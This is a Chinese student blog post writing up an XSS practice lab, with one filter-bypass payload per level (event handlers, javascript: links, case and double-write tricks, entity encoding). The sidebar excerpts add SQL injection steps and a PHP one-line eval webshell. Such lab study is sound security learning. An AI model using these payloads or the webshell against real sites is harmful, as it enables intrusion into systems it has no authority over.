我的网安作业4

已于 2024-09-02 08:47:08 修改
阅读量258 收藏 3
点赞数 8
文章标签: java 前端 javascript
于 2024-09-01 19:13:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76714452/article/details/141721437
版权

XXS靶场

level1

<script>alert(1)</script>

level2

按照的第一关的方法插入html语句发现没用,f12后查看位置发现我们的输入在value里被闭合掉了

这种情况我们将前面的语句加 ”>给闭合掉,后面我们的输入就是一个新的执行语句。 

"><script>alert(1)</script>

level3

使用前两种方法都没用,怀疑被htmlspecialchars()函数给过滤

我们查看源码后发现 <>被过滤了

使用onfocus事件

'οnfοcus=javascript:alert('xxs');'

level4

用之前的方法发现<script>alert(1)</script> <>被转义

尝试一下闭合,成功 

" οnclick='alert(1)'>

level5

还是先测试<script>alert(1)</script>,然后查看源代码

发现有<>的转义,还在script中间加了下划线_,接着尝试闭合,同样存在闭合和转义,所以利用a标签的href来闭合

"><a href=javascript:alert(1)>

level6

href,onclick,<script>都被加上下划线了 ,尝试大小写绕过

"><a Href=javascript:alert(1)>

level 7

把script给删了

试试双写绕过,成功

"><scrscriptipt>alert(1)</scrscriptipt>

level 8

发现script被加下划线了,双写大小写绕过都没有用,尝试html编码绕过,成功

level9

用第八关的方法,结果提示链接不合法,给后面加一个真实的链接

源代码要求链接必须含有http://,那就把http://注释掉:/*http://*/

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;/* http:// */

2301_76714452
关注
我的网安作业
wwp的博客
01-31 120
一 Sqli-labs: 由于是完全的新手,所以有很多都不太了解,嗯sqli-labs我做了第一第二第三关,原理都差不多所以以第三关为例: 不知道为什么我的PHPstudy启动总是有问题。 于是每次都得自己手动开启MySQL的服务: 好了启动成功,开始进入正题。 2021/1/31: 1.判断是否有SQL注入 http://127.0.0.1/sqli/Less-3/?id=1 http://127.0.0.1/sqli/Less-3/?id=1’ 由于两次结果的显示明显不同,因此判断存在SQL注入漏
我的网安作业2/21
wwp的博客
02-21 116
一、SQL-labs Less8 1.判断是否存在SQL注入 http://127.0.0.1/sqli/Less-8/?id=1 http://127.0.0.1/sqli/Less-8/?id=1' 由两次结果可知,存在SQL注入问题。 2.构造正确的SQL语句 http://127.0.0.1/sqli/Less-8/?id=1' --+ 3.开始猜解表名 由于是布尔盲注,手动实在是太慢了,我觉得用burpsuite爆破都很麻烦,但是我自己的代码能力又很差,唉,彷佛看到了我的网安之路的终点
我的网安作业5
2301_76714452的博客
09-01 1543
修改密码,通过将admin闭合,之后的内容不执行,达成恒真条件,完成修改管理员密码的注入。与十一关差不多,闭合方式不同,闭合方式为:") #通过查看源码可以得知在修改密码时的闭合方式为‘#报错注入 查出网站的数据库里的目标表名。报错注入 查出网站的数据库里的目标表名。报错注入 查出网站的数据库里的目标表名。判断闭合方式,闭合方式为:') #报错注入 查出目标表中的所有列名。报错注入 查出目标表中的所有列名。报错注入 查出目标表中的所有列名。查出网站的数据库里的目标表名。判断闭方式,闭合方式为:" #
我的网安作业7
2301_76714452的博客
09-05 159
upload-labs靶场。
我的网安作业2
2301_76714452的博客
08-27 191
在这个登录界面用burpsuite代理进行拦截。选择攻击类型,配置插入位置。导出后生成表格下载表格。二.简单的表单暴力破解。
网安作业2
m0_70187377的博客
08-27 202
在插入文件功能内可以看到一个文件夹进入var/www/html路径可以看到之后访问url+/nothinghere/fl000g.txt得到flag。在url后面加/www.zip可以下载得到源文件,文件提示flag,in fl000g.txt,访问得到flag。访问url+/tz.php得到页面进入PHP参数一栏,点击phpinfo CTRL+F搜索flag。访问url+/db/db.mdb,下载文件,打开文件之后搜索flag,成功找到flag。通过在url后加/.svn访问得到flag。
网安作业1
dsahah的博客
07-12 111
接1/0/21/0/4建立需要区域办公区生产区游客区完成用户管理市场部研发部办公区-研发部办公区-市场部完成登录建立用户。
我的网安作业2/14
wwp的博客
02-14 131
一、sql-labs Less7 1.前期准备 在PHPstudy下的PHPTutorial/mysql/my.ini文件里面添加一句。(为了后期支持文件的读写) 2.一句话木马 在phpStudy\PHPTutorial\WWW的文件夹下新建一句话木马文本。 根据后面出现的bug,正确的语句应该是: <?php @eval($_POST["a"]);?> 启动中国菜刀: 连接木马: 两个基本函数:load_file()读取本地文件;into outfile 写文件。 3.判断是否存在
我的网安作业2/7
wwp的博客
02-07 164
一、sqli-labs less4: 打开less4的index.php文件,在SQL语句下添加如下两句: echo $sql; echo "<br>"; 1.判断是否存在注入: http://127.0.0.1/sqli/Less-4/?id=1 http://127.0.0.1/sqli/Less-4/?id=1'显式正确 http://127.0.0.1/sqli/Less-4/?id=1"显式不正确 得到报错信息: 根据报错信息构造正确的SQL语句: http://127.0.0
东南大学网安学院模式识别作业答案&考试真题回忆版
02-26
这门课很简单,可以翘课,跟着PPT自学就行,但是课后作业是重中之重,考试范围的百分之九十都是从做过的作业里面变式。无论你有多摆,请认真对待这门课的作业,因为他量很少,但是很有用!期末的真题回忆的很粗糙,...
作业复习】 网安.docx
09-19
作业复习】 网安.docx
周玉川-2017221302006-网安技术第七次作业1
08-08
周玉川同学的第七次作业主要探讨了入侵检测的分类、主要技术指标以及未知攻击检测方法,并提出了一个实践性的课后练习。 1. 入侵检测的分类: - 异常检测模型(Anomaly Detection):这种模型依赖于对正常行为的...
【C++刷题】力扣-#121-买卖股票的最佳时机
会写代码的饭桶
10-16 545
给定一个数组 prices,其中 prices[i] 表示第 i 天的股票价格。假设你可以在第 i 天买入并在第 j 天卖出股票(i ≤ j),设计一个算法来计算你所能获取的最大利润。注意你只能持有一股股票,并且你不能同时参与多笔交易(即在再次买入前必须卖出股票)。
基于SSM班级事务管理系统的设计
2401_87849773的博客
10-15 414
管理员账户功能包括:系统首页,个人中心,学生管理,班委管理,班会组织管理,健康档案管理,党员发展管理,党员培训管理,学生成绩管理。主要技术:Java,Spring,mybatis,mysql,jquery,html。班委账号功能包括:系统首页,学生管理,学生成绩管理,活动信息管理,班费通知管理。服务器:SpringBoot自带 apache tomcat。JDK版本:Java JDK1.8。数据库可视化工具: navicat。数据库版本: mysql5.7。开发系统:Windows。
Java安卓开发之Fragment开发(通俗易懂版)——第8章
一个脚本小子的博客
10-13 701
FragmentManager中的getSupportFragmentManager()方法不支持Activity,不论是旧版的FragmentManager还是新版的,因此我们要把继承Activity类改成继承AppCompatActivity类。
JavaWeb合集05-SpringBoot基础知识
最新发布
qq_57340195的博客
10-17 851
Autowrite :自动装配,通过声明的数据类型来装配对应的bean对象。缺点,只能获取到一个相同类型的bean对象,如果有IOC容器里面有2个Bean对象,使用@Autowrite依赖注入就好报错。由于三层架构中,每一层都需要下次成来提供对应的方法,所有要new 下一次的对象,如果上一层的类名发送改变,那么上一层就需要修改对应的类名,如下。3、@Resource注解:通过它来代替@Autowrite注解,直接指定要注入的Bean对象,参数name的值就是要注入的Bean对象。
【SpringBoot的启动、处理请求整体流程(二)】
m0_50149847的博客
10-13 924
同时,如果文章有错误,也欢迎批评指正。本篇文章继之后,可以先阅读第一篇文章。
spring task的使用场景
qq_40603125的博客
10-13 372
spring任务调度框架约定的时间。
Hex编码
weixin_74305514的博客
10-13 297
emps;是一种将数据转换为十六进制表示的方法。Hex编码使用16个字符来表示数据。&emps;
github网安项目
04-24
4. Nmap:Nmap是一个网络扫描和主机发现工具,它可以帮助安全专家评估网络的安全性。Nmap的源代码也在GitHub上开放,用户可以自由地访问和贡献代码。 5. Security Shepherd:Security Shepherd是一个教育性的Web...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值